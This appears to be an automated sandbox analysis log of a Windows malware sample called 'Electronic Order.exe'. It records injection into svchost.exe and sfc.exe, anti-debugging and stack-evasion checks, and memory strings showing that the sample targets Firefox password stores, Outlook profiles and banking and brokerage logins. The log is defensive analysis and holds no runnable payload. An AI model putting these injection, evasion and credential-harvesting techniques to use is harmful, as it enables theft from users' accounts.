            Source: sfc.exe, 00000007.00000003.2683963473.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2674886619.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2674767278.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3957493430.0000000002D89000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3957493430.0000000002D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Electronic Order.exeReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\Electronic Order.exe "C:\Users\user\Desktop\Electronic Order.exe"
            Source: C:\Users\user\Desktop\Electronic Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Electronic Order.exe"
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Electronic Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Electronic Order.exe"Jump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Electronic Order.exeStatic file information: File size 1205760 > 1048576
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Electronic Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BSPmWtBGjJwku.exe, 00000005.00000000.2308549836.000000000087E000.00000002.00000001.01000000.00000005.sdmp, BSPmWtBGjJwku.exe, 00000009.00000000.2557513223.000000000087E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Electronic Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Electronic Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Electronic Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Electronic Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Electronic Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E3C304 LoadLibraryA,GetProcAddress,0_2_00E3C304
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE8B85 push ecx; ret 0_2_00DE8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181F4 push ecx; ret 2_2_004181F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D27F push ds; ret 2_2_0040D28D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033F0 push eax; ret 2_2_004033F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A478 push 00000025h; iretd 2_2_0041A534
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042DC13 push edi; ret 2_2_0042DC1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413CE1 push 57C83816h; retf 2_2_00413D79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D6A push 57C83816h; retf 2_2_00413D79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A515 push 00000025h; iretd 2_2_0041A534
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A624 push ecx; retf 2_2_0041A625
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C68F push esi; ret 2_2_0040C691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041377B push es; retf 2_2_00413782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040872A push ecx; ret 2_2_0040872B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350225F pushad ; ret 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035027FA pushad ; ret 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx2_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350283D push eax; iretd 2_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350135E push eax; iretd 2_2_03501369
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0315225F pushad ; ret 7_2_031527F9
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031527FA pushad ; ret 7_2_031527F9
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx7_2_031809B6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0315283D push eax; iretd 7_2_03152858
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03151368 push eax; iretd 7_2_03151369
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007500AC pushfd ; ret 7_2_007500AD
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00740388 push es; retf 7_2_0074038F
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0074252D push edx; ret 7_2_00742537
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0075A820 push edi; ret 7_2_0075A82C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007408EE push 57C83816h; retf 7_2_00740986
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00740977 push 57C83816h; retf 7_2_00740986
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00744E01 push ecx; ret 7_2_00744E03
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00747085 push 00000025h; iretd 7_2_00747141
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DC4A35
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E455FD
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DE33C7
            Source: C:\Users\user\Desktop\Electronic Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Electronic Order.exeAPI/Special instruction interceptor: Address: 1583254
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 9834Jump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\sfc.exeAPI coverage: 2.5 %
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440Thread sleep count: 137 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440Thread sleep time: -274000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440Thread sleep count: 9834 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440Thread sleep time: -19668000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe TID: 6428Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe TID: 6428Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E24696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E24696
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E2C9C7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2C93C FindFirstFileW,FindClose,0_2_00E2C93C
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E2F200
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E2F35D
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2F65E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E23A2B
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E23D4E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2BF27
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0074C1A0 FindFirstFileW,FindNextFileW,FindClose,7_2_0074C1A0
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DC4AFE
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - EU East & CentralVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 30-335c-.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 30-335c-.7.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 30-335c-.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware2
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.co.inVMware20,11696487552~
            Source: 30-335c-.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 30-335c-.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552u
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers - non-EU EuropeVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958550650.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2808962227.000001354145C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 30-335c-.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 30-335c-.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .bankofamerica.comVMware20,11696487552|UE
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 30-335c-.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 30-335c-.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 30-335c-.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 30-335c-.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,
            Source: 30-335c-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autofill_travelsVMware2
            Source: 30-335c-.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 30-335c-.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 30-335c-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 30-335c-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - COM.HKVMware20,11696487552
            Source: 30-335c-.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552
            Source: C:\Users\user\Desktop\Electronic Order.exeAPI call chain: ExitProcess graph end nodegraph_0-98283
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417913 LdrLoadDll,2_2_00417913
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E341FD BlockInput,0_2_00E341FD
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DC3B4C
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00DF5CCC
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E3C304 LoadLibraryA,GetProcAddress,0_2_00E3C304
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_01583520 mov eax, dword ptr fs:[00000030h]0_2_01583520
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_015834C0 mov eax, dword ptr fs:[00000030h]0_2_015834C0
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_01581E70 mov eax, dword ptr fs:[00000030h]0_2_01581E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]2_2_035FA352
